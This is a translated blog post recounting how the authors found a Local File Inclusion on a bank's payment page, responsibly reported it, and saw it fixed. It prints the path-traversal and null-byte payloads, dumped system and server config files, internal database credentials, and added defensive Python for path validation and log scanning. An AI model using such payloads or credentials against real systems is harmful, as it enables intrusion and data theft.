
The story of a single penetration

The threads about hacker phishing prompted me to write this post.

I want to share with you a story that happened to me several years ago.

I must say, my hobby is web application security.
While wandering around the internet, my friend happened upon a website for sending free SMS to numbers of Ukrainian operators. There we found a small vulnerability: a bypass of the Turing test (captcha).
Since my friend and I love looking for vulnerabilities, we turned it into a game: which of us could bypass the captcha faster.
But today's story is not about that, but about what we discovered next.



Once, my friend, looking through the source code of a page on the free-SMS site, found an interesting piece of HTML (the stray quote before 'quickpay' in the scraped copy has been removed so the window.open call reads correctly):

<A HREF="#" onClick="javascript:window.open('https://hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=service_host.xsl', 'quickpay', 'toolbar=0,status=0,menubar=0,scrollbars=0,width=650,height=400', false);" CLASS="header"><IMG SRC="www.sms1.ua/img/topupeasy.jpg" WIDTH="82" HEIGHT="34" ALT=" !" BORDER="0" VSPACE="0"></A>


The link, which judging by its parameters loads a file (xslt_url=service_host.xsl), interested us a lot.

In less than 5 minutes we had found a Local File Inclusion vulnerability.

The vulnerability was in the following link:

hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=<local_file>


With this vulnerability, you can read local files directly in the browser.

We made a request to the server for a non-existent file, and this is what we received:

Request URL:
hackbank.ua/test?&xslt_url=0


The server response was something like this:
500 Servlet Exception

...........................

Resin-3.0.s060216 (built Thu, 16 Feb 2006 09:17:50 PST)



Honestly, that was the first time I had heard of Resin. Resin is a high-performance Java application server with features such as scalability and load balancing.

Product information we were able to find on Wikipedia at the time:

Developer: Caucho Technology, Inc.
Latest version: 3.1.1 (2007)
License: GPL
Website: www.caucho.com




After downloading this software, we started to study it.

And so, the Resin software folder structure:

|   configure
|   httpd.exe
|   LICENSE
|   Makefile.in
|   README
|   setup.exe
|
+---automake
|       config.guess
|       config.sub
|       install-sh
|       ltmain.sh
|       missing
|
+---bin
|       httpd.sh
|
+---conf
|       app-default.xml
|       development.conf
|       fine.conf
|       minimal.conf
|       password.xml
|       resin-3_1.conf
|       resin-admin.xml
|       resin.conf
|
+---contrib
|       init.resin-iptables
|       init.resin.in
|
+---lib
|       activation.jar
|       eclipse-compil

Now let's go back to the vulnerability.

Let's start with the classics:
at the link hackbank.ua/test?xslt_url=../../../../../../etc/passwd

we get this output:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Servic


Then we started looking for where the Resin server's conf folder was stored locally, and found it quite quickly.
The config is an XML file, which was available at the link hackbank.ua/test?xslt_url=../../../../../../conf/resin.conf%00

%00 is a null byte; it tells the web server that the string ends there, so whatever the application appends to the file name after our input is ignored.
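To show why both tricks (the ../ traversal and the %00 truncation) work, and what a resolver that refuses them looks like, here is an added Python model; it is not the bank's or Resin's code, and BASE_DIR and the ".xsl" suffix behaviour are assumptions.

```python
import posixpath
from typing import Optional

# Assumed stylesheet directory; the real path on the bank's server is not in the post.
BASE_DIR = "/usr/local/resin/webapps/ROOT/xsl"


def resolve_vulnerable(xslt_url: str) -> str:
    """Models the defect described in the post (assumed behaviour): the parameter
    is joined onto BASE_DIR unchecked, ".xsl" is appended when missing, and the
    path is then handed to a C-style API that stops at the first NUL byte."""
    path = posixpath.join(BASE_DIR, xslt_url)
    if not path.endswith(".xsl"):
        path += ".xsl"
    # %00 decodes to "\0"; everything after it (the forced suffix) is ignored.
    path = path.split("\0", 1)[0]
    return posixpath.normpath(path)


def resolve_hardened(xslt_url: str) -> Optional[str]:
    """Refuse NUL bytes and absolute paths, canonicalize, then require the result
    to stay under BASE_DIR and to name a stylesheet. None means reject."""
    if not xslt_url or "\0" in xslt_url or xslt_url.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, xslt_url))
    # Containment test on the canonical path, not on the raw user string.
    if not candidate.startswith(BASE_DIR + "/"):
        return None
    if not candidate.endswith(".xsl"):
        return None
    return candidate
```

On a real filesystem, run the containment test on os.path.realpath() so symlinks are resolved as well; better still, map a short key to a fixed stylesheet and never accept a path from the client at all.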


Next, we look at the source of the resulting file.

<?xml version="1.0" encoding="utf-8"?>
<resin xmlns:resin="http://caucho.com/ns/resin/core" xmlns="http://caucho.com/ns/resin">
  <server>
    <http port="1080" />
    <http port="10443">
      <jsse-ssl>
        <key-store-type>JKS</key-store-type>
        <key-store-file>keys/hackbank.jks</key-store-file>
        <password>fynbxfn</password>
        <key-manager-factory>6645b</key-manager-factory>
        <ssl-context>SSL</ssl-context>
      </jsse-ssl>
    </http>
    <host id="" root-directory=".">
      <access-log path="log/access.log" format="%h %l %u %t &quot;%r&quot; %s %b &quot;%i&quot; &quot;%i&quot;" rollover-period="1W" />
      <stderr-log path="log/stderr.log" timestamp="[%Y.%m.%d %H:%M:%S.%s] " rollover-period="1W" />
      <stdout-log path="log/stdout.log" rollover-period="1W" />
      <log path="log/server.log" timestamp="[%Y.%m.%d %H:%M:%S.%s] " rollover-period="1W" />
      <web-app id="/" document-directory="webapps/ROOT" />
      <ear-deploy path="deploy">
        <ear-default ejb-server-jndi-name="java:comp/env/ejb">
          <ejb-server jndi-name="java:comp/env/ejb" />
        </ear-default>
      </ear-deploy>
      <web-app-deploy path="webapps" />
      <resource-deploy path="deploy" />
      <web-app-deploy path="deploy" />
    </host>
    <resin:import path="$/conf/db-pool.xml" />
    <resin:import path="$/conf/c2b-db-pool.xml" />
    <resin:import path="$/conf/db-pool-qp.xml" />
    <resin:import path="$/conf/hb-default.xml" />
    <resin:import path="$/conf/resin-status.xml" />
  </server>
  <resin:import path="$/conf/resin-common.xml" />
</resin>


Here are all the web server logs:

hackbank.ua/test?xslt_url=../../../../../../log/access.log
hackbank.ua/test?xslt_url=../../../../../../log/stderr.log
hackbank.ua/test?xslt_url=../../../../../../log/server.log
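Those same logs are where a defender would have spotted this. As an added example (not from the original post), here is a small Python scanner over access-log lines in the layout declared by the resin.conf above (%h %l %u %t "%r" %s %b "%i" "%i"); the sample lines are constructed and the detection rules are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines; hosts, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.1.1.5 - - [12/Mar/2010:10:15:22 +0200] "GET /test?xslt_url=service_host.xsl HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.1.1.9 - - [12/Mar/2010:10:16:03 +0200] "GET /test?xslt_url=../../../../../../etc/passwd HTTP/1.1" 200 1839 "-" "curl/7.19"
10.1.1.9 - - [12/Mar/2010:10:17:41 +0200] "GET /test?xslt_url=..%2F..%2F..%2Fconf%2Fresin.conf%00 HTTP/1.1" 200 2210 "-" "curl/7.19"
10.1.1.9 - - [12/Mar/2010:10:18:00 +0200] "GET /test?xslt_url=0 HTTP/1.1" 500 612 "-" "curl/7.19"
"""

# %h %l %u %t "%r" %s ... ; %r is "METHOD target PROTOCOL".
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def suspicious_params(target: str, watched=("xslt_url",)) -> list:
    """Return the reasons a request target looks like file-inclusion abuse."""
    reasons = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; this catches double-encoding
            if "\0" in value:
                reasons.append(f"{name}: null byte")
            if ".." in value.replace("\\", "/").split("/"):
                reasons.append(f"{name}: path traversal")
            if value.startswith("/"):
                reasons.append(f"{name}: absolute path")
    return reasons


def scan_access_log(text: str) -> list:
    """Parse each log line and keep the ones whose watched parameters look abusive."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = suspicious_params(m["target"])
        if reasons:
            findings.append({"host": m["host"], "time": m["time"],
                             "status": int(m["status"]), "target": m["target"],
                             "reasons": reasons})
    return findings
```

A 200 status on a flagged request (as opposed to the 500 for the bogus file) is the signal that the read actually succeeded.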


There we found nothing interesting. But we went further :)

The file ../../../../../../conf/c2b-db-pool.xml%00 contained:

10.1.101.195:5000
-----------------
user : C2BServer
password : vsirfysy

10.1.100.105:5000
-----------------
user : C2BServer
password : lfktrbq,thtu

10.1.100.115:5000
-----------------
user : jbkl
password : 123456


The file ../../../../../../conf/db-pool.xml%00 contained:

10.1.101.51:5000
-----------------
user : 16_jag
password : u4BKoc7U5Edo

10.1.100.77:5000
-----------------
user : hskl
password : hsklhskl

10.1.99.49:4100
-----------------
user : wbpfo_p424
password : aUKlOfcvT4YmAnk

10.1.99.82:5000
-----------------
user : P24CVC
password : Login_4_P424CVC


Guess what this is? That's right, these are credentials for other servers on the bank's internal network :)

The next day we wrote a letter describing all the vulnerabilities we had managed to find and sent it to the bank's e-mail address. After 3 weeks the vulnerabilities were still there. We sent another letter, and a week later, to our joy, they were fixed.

We did not want to offend anyone with this article; we just want to convey to the world that there are no secure systems. Hire professionals who will audit your information systems.

For any questions, please contact vadim@g-sg.net

* Attention! All links, as well as the name of the bank, have been changed for reasons of anonymity. *


Thanks for your attention!

UPD. Report any errors in the text via private messages. Thanks!

Source: https://habr.com/ru/post/86368/